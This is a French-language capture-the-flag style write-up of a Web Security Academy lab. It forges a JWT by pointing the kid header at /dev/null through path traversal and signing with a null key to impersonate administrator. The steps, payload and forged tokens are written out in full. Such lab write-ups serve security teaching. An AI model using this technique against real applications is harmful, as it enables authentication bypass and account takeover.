Bypass d’authentification JWT via path traversal dans kid

JWT authentication bypass via kid header path traversal

Lab: JWT authentication bypass via kid header path traversal | Web Security AcademyWebSecAcademy

Contexte du lab

L’application utilise des JWT pour gérer les sessions. Pour vérifier la signature, le serveur lit l’en-tête du JWT et récupère la clé de vérification depuis le système de fichiers en se basant sur la valeur du champ kid (Key ID). Problème : la valeur de kid n’est pas correctement validée, ce qui permet un path traversal afin de pointer vers un fichier arbitraire du système.

Objectif : forger un JWT donnant accès à /admin, puis supprimer l’utilisateur carlos.

Point de départ

Après connexion avec wiener:peter, on récupère un JWT valide :

Header : alg = HS256, kid = <uuid>
Payload : sub = wiener

eyJraWQiOiIxZmM4YzUzYS1mMzMwLTRhNGMtODFkOC01ZjNlOGRmMzNkNWMiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsImV4cCI6MTc2NzU0OTY1OSwic3ViIjoid2llbmVyIn0.qFrtPadwDKEghfc4hGLNhDQolFAJ6rvPW22120KEGHU

Idée de l’attaque

Comme kid sert de chemin pour charger la clé, on peut tenter de le faire sortir du répertoire attendu avec ../ afin de viser un fichier spécial : /dev/null.

/dev/null se comporte comme un fichier “vide”.
Si le serveur charge la “clé” depuis ce fichier, il se retrouve (dans ce scénario) à vérifier la signature avec une clé équivalente à nul / vide.

Construction d’une clé symétrique “nulle”

Tu génères un octet nul et tu l’encode en Base64 :

Commande :

echo -ne '\0' | base64

AA==

Puis tu construis un JWK de type symétrique (kty: oct) dont la clé (k) est AA== :

{
    "kty": "oct",
    "kid": "9c48f618-fb2c-4bf6-85f6-7cb92c0cfa1c",
    "k": "AA=="
}

(Le kid du JWK ici sert juste d’identifiant côté outil ; l’important, c’est la valeur k.)

Exploitation : `kid` en traversal vers `/dev/null`

Tu modifies ensuite l’en-tête du JWT pour faire pointer kid vers /dev/null via traversal :

{
    "kid": "../../../../../../../../dev/null",
    "alg": "HS256"
}

Puis tu changes le sub dans le payload pour te faire passer pour un compte admin (dans ton cas administrator) et tu signes le JWT en HS256 avec la clé “nulle” (AA==).

Résultat

JWT final forgé (celui que tu fournis) :

kid traverse jusqu’à /dev/null
alg reste HS256
sub devient administrator

eyJraWQiOiIuLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9kZXYvbnVsbCIsImFsZyI6IkhTMjU2In0.eyJpc3MiOiJwb3J0c3dpZ2dlciIsImV4cCI6MTc2NzU0OTY1OSwic3ViIjoiYWRtaW5pc3RyYXRvciJ9.mSLXreEdgmhgAPOPLS9-j7A1VUiRjK-DA1YvGzqsxOo

Le serveur accepte le token : ça confirme que la résolution de kid est exploitable et que la vérification de signature se fait avec une clé dérivée du fichier ciblé (ici “vide”).

Mis à jour il y a 1 mois

hashtagJWT authentication bypass via kid header path traversal

hashtagContexte du lab

hashtagPoint de départ

hashtagIdée de l’attaque

hashtagConstruction d’une clé symétrique “nulle”

hashtagExploitation : kid en traversal vers /dev/null

hashtagRésultat